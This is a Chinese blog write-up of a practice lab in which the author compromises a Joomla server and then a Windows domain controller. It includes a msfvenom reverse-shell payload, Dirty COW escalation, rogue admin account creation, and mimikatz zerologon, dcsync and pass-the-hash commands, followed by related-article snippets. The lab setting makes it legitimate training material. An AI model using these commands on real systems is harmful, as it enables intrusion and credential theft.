利用PTH攻击获取域控权限

已于 2024-10-01 22:48:00 修改
阅读量793 收藏 25
点赞数 11
分类专栏: 靶场 文章标签: 网络 运维 安全 开发语言 linux
于 2024-10-01 22:44:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58189050/article/details/142673139
版权

0x00前言

网络环境

链接:https://pan.baidu.com/s/1yI8DfkE6Em7zuN3_Gjv6HA?pwd=dzl8
提取码:dzl8

环境准备:

除攻击机外,其他5台目标靶机的密码均未知,黑盒测试

WEB_CentOS在开始需要将双网卡基于上表进行配置,并在系统内执行如下命令,以保证可以获取到IP地址:

service network restart

tips:在WEB1_Ubuntu上的某个位置存放了一个文档,该文档中保存了登录WEB_CentOS的username和password

0x01信息搜集

IP识别,也可以用namp等其他方法。

经过尝试发现目标IP为192.168.190.199

端口扫描

 发现目标主机开放了22,80,3306端口,可以对22,3306进行爆破。

22端口爆破(由于在tips中也给我们一个目标的普通用户的账号,我猜测靶场的作者是想让我们用普通用户登录在进行提权等其他操作,所以我就把这个信息忽略了)

 3306爆破

尝试登陆数据库 

进入数据库发现数据库可以读写文件,但是不知道网站的详细目录,想在数据库日志中写入一句话。但是数据库没有开启日志。遂放弃去80端口查看。

80没有什么功能点,目录扫描

发现 可疑网页

也发现了一个账号是数据库的和之前的差不多。

 发现了登陆页面,但是我已经进入的数据库那我就尝试找到数据库中账号的具体数据。

在网上查找了资料。

在这张表中找到了数据。但是密码是加密的不可逆.之后我也在网上找到了重置密码的方法。

如何恢复或重置管理员密码? - Joomla! Documentation

把密码替换了成功进入。

经过对所有国能点的查看,发现了一个编辑代码的功能。

http://192.168.190.199/administrator/index.php?option=com_templates&view=template&id=503&file=aG9tZQ==

 写入了一句话木马尝试连接。

0x02ubuntu上线

连接成功。

在使用指令时发现没有回显,可能是对函数进行了限制。

在目录扫描 时1.php 时phpinfo() ;

可以在蚁剑下载插件。

https://github.com/Medicean/as_bypass_php_disable_functions

 发现上线的是ubuntu???我不是在centos上的网站上线的吗??后面我会解析。

发现centos的用户名密码。尝试登陆

0x03centos提权

成功登陆centos,发现需要提权,所以我尝试提权。

 我发现centos的内核版本正好在脏提权的范围内。

尝试提权。

https://github.com/FireFart/dirtycow,下载工具把工具上传到你目标机器

提权成功 

0x04Centos MSF上线

制作木马

制作木马上传。因为目标是linux所以用msf制作木马。

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.190.186 LPORT=4444 -f elf -o 4444.elf

kali监听

把后门上传到目标主机并运行。

成功上线。创建路由。

 设置代理进行内网信息搜集

我在本地使用proxifier 总是不稳定所以我就直接在kail上使用代理里。

需要修改配置。设置代理。

0x05内网信息搜集

先判断一下内网存活的IP。

for i in {1..254}; do ip=192.168.93.$i; ping -c 1 -W 1 $ip > /dev/null && echo "$ip is up"; done

proxychains nmap -sT -Pn -sV 192.168.93.10 192.168.93.20 192.168.93.30

需要等待很长。。。。。。。。

发现每个主机上面都有445端口,在msf在扫描一下。获取详细的版本

0x06win7/win8上线 

发现了smb可以用hdyra进行爆破。尝试获得密码用psexec进行横向移动。

获得密码尝试横向移动。 

win7/win8密码都一样。

WIN7上线。 win8也一样

0x07获得域控的权限

获取域控凭证信息需要用到mimikatz.因为win7有3389端口,现把工具上传到win7在操作。

连接3389端口,使用administrator登陆失败。

shell
net user zsj 123@qq.com /add
net localgroup Administrators zsj /add

自己创建用户并加入管理员组。

成功进入 

启动mimikatz。

# 开启调试
privilege::debug
lsadump::zerologon /target:WIN-8GA56TNV3MV.test.org /account:WIN-8GA5
6TNV3MV$
lsadump::zerologon /target:WIN-8GA56TNV3MV.test.org /account:WIN-8GA5
6TNV3MV$ /exploit
#提取hash
lsadump::dcsync /domain:test.org /dc:WIN-8GA56TNV3MV.test.org /user:administrator /authuser:WIN-8GA56TNV3MV$ /authdomain:test /authpassword:"" /authntlm
lsadump::postzerologon /target:test.org /account:WIN-8GA56TNV3MV$
#pth
sekurlsa::pth /user:administrator /domain:test.org /ntlm:18edd0cc3227be3bf61ce198835a1d97

mimkatz获取到ntlm后进行pth,可以用psexec进一步利用。

先把psexec上传到win7.从win7上传到域空 copy mimikatz \\192.168.93.10\c$

 psexec.exec 192.168.93.10 cmd.exe 就弹出cmd 需要执行两次。

guowu666
关注
专栏目录
内网渗透(五十三)之域控安全和跨攻击-利用信任密钥获取目标域控
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-24 393
上传asktgs.exe和kirbikator.exe工具,asktgs.exe伪造票据,kirbikator.exe注入票据。使用mimikatz获取 当前的 SID 父的 SID 子管的NTLM 信任密钥。当前已经控制abc.hack.com,其中包括 DC2机器和PC-2008-2机器。创建计划任务,如果拒绝访问,请注入host服务票据。创建CIFS服务的票据进行复制文件的操作。在普通的内用户中创建创建高权限票据。伪造host服务,进行创建计划任务。这个是我们的恶意文件。
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&PTH哈希&PTT票据&PTK密匙&Kerberoast攻击点&TGT&NTLM爆破
HACKONE的博客
06-23 181
请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码哈希用于加密服务票证。生成票据文件:shell ms14-068.exe -u webadmin@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!PTH(pass the hash) #利用的lm或ntlm的值进行的渗透测试(NTLM认证攻击
68内网安全-横向PTH&PTK&PTT哈希票据传递
san3144393495的博客
12-29 1606
今天讲PTH&PTK&PTT,PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试 用的Kerberos 协议PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试lm加密算法是2003以前的老版,2003用户均为ntlm 算法的hash。
渗透之PTH横向攻击
qq_55202378的博客
05-20 254
命令行也可以连接RDP,上述指令可能连不成功。直接连接肯定不行,因为没有凭据。输入IP就行,不用输入密码。前提:RDP明文连接过。
内网渗透之如何批量PTH获取主机权限
2301_80115097的博客
05-11 349
其缔造者@byt3bl33d3r称,该工具的生存概念是,“利用AD内置功能/协议达成其功能,并规避大多数终端防护/IDS/IPS解决方案。声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。但如果你没有明文密码也没关系,用Mimikatz找到用户的hash,给他配置上去也可以批量探测hash。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。获取密码策略:—pass-pol。
使用mimikatz利用哈希传递获取域控权限
qq_54713392的博客
06-29 1042
使用mimikatz利用哈希传递获取域控权限 靶机 window server 2012 IP 192.168.1.22 攻击机 window7 IP 192.168.1.34 (1)win2012 server获取目标hash对应用户名administrator,500,获取目标的NTLM哈希值可以使用mimikatz或者pwdump7 使用pwdump7,执行命令Pwdump7.exe 导出信息到1.txt中 复制出ntlm CE28B42F9943D0552385BC5F6338F9B9 (2)在
内网渗透实战攻略(1),2024HarmonyOS鸿蒙进阶新篇章
2401_84181108的博客
04-15 932
这几章为本书的核心内容,将带领读者系统化搭建和攻破9个风格各异的内网环境,涉及30余台目标主机的探测和攻破过程。这几章将对内网渗透技术的高频攻击和防御手法进行全面演示,包括利用phpMyAdmin日志文件获取服务器权限执行进程注入攻击、收集内网信息、利用Mimikatz获取内网Windows服务器密码、通过PsExec建立IPC通道等60多种具体的操作手段。介绍实战所需的软件环境以及接下来高频使用的各类工具,为实战环节做好准备。7.6.3 利用PTH攻击内服务器 224。
内网安全 - 横向 PTH&PTK&PTT
acepanhuan的博客
03-16 446
内网安全 - 横向 PTH&PTK&PTT
掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了
等风来
01-10 2803
当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战中,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persistent Threat,高级持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比,APT攻击在技术上更加系统地实现了对目标内网主机的大批量控制,从而使业内对内网渗透技术的关注度提高到了一个空前的高度。
内网安全(四)---横向渗透:PTH&PTK&PTT
qi_SJQ_的博客
02-11 4401
横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值。 PTT(pass the ticket): 利用的票据凭证 TGT 。 PTK(pass the key) : 利用的 ekeys 、aes256 。 1)PTHPTH 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。 如果禁用了 ntlm 认证,
为什么TCP(TIME_WAIT)2倍MSL
weixin_44102162的博客
11-01 744
MSL(最大报文段生存时间)是TCP协议中定义的一个常量,表示TCP报文在网络中存活的最长时间。等待2倍MSL的原因是为了给报文提供足够的时间消失或确认。第一个MSL:等待网络中的FIN和ACK报文到达对方,确保双方完成连接关闭。第二个MSL:等待可能在网络中滞留的所有旧报文完全失效,避免与未来的新连接混淆。TIME_WAIT状态在TCP协议中扮演了确保数据完整性和网络可靠性的角色,通过2倍MSL时间的等待机制,防止ACK丢失以及旧报文干扰新连接。
网络模型——二层转发原理
weixin_61967363的博客
11-02 1356
本文章详细介绍了ISO七层网络模型和TCP/IP四层模型,介绍了二层转发的原理。详细解释了交换机转发数据的过程。
嵌入式通信协议:MODBUS简明学习笔记
weixin_73867577的博客
11-02 352
学习Modbus的简明学习笔记
软设师知识点-计算机网络
loop_nervous的博客
11-04 957
在一台安装好TCP/IP协议的计算机上,当网络连接不可用时,为了测试编写好的网络程序,通常使用的目的主机IP地址127.0.0.1(本地回送地址)
计算机网络综合题
最新发布
2303_80204192的博客
11-06 216
解题步骤
【知识科普】常见网络安全问题以及应对方式
wendao76的专栏
11-03 651
通过实现。
Hyperledger Fabric 入门笔记(十六)Fabric V2.5 测试网络部署补充 - 手动从通道中移除组织
sbsy123456的博客
11-06 289
本节介绍如何从包含了组织Org1、Org2和Org3的Fabric测试网络中移除组织Org2。
架构系列---高并发
lipviolet的博客
11-04 1047
年轻的时候看到文章说到百万并发总是感慨万千,虽然很多文章都是标题上有两个字,但是也不妨碍我对这些的憧憬,到底怎么样才能扛百万并发呀?这系统该多么牛逼呀但是接触多了高并发的系统,再系统学习这方面知识后 ,你就会发现 : 百万并发确实牛皮,但是也没有那么神秘。虽然有不少技术点,但是思路其实不难。核心要点 :不论多大的流量,其最终的目的都是对流量进行分流,即负载均衡。文章效果 :能对流量分发和负载均衡有一个全面的理解,但是细节方法的使用无法提供高并发的应对方案:分而治之。
提高交换网络可靠性之端口安全配置
m0_53649704的博客
11-03 398
7.laptop0 ping PC0,不通,且端口直接自动关闭了。此实验为配置交换机端口安全,当非法设备接入接口时自动触发安全措施。6,添加一台PC机,按照图中要求配置ip地址。2.交换机改名为S1,同时启用端口安全。4.设置违规处理方式:即违规则关闭端口。1.查看PC1和PC2的MAC地址👇。5.查看安全端口相关信息。3.配置允许接入设备。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值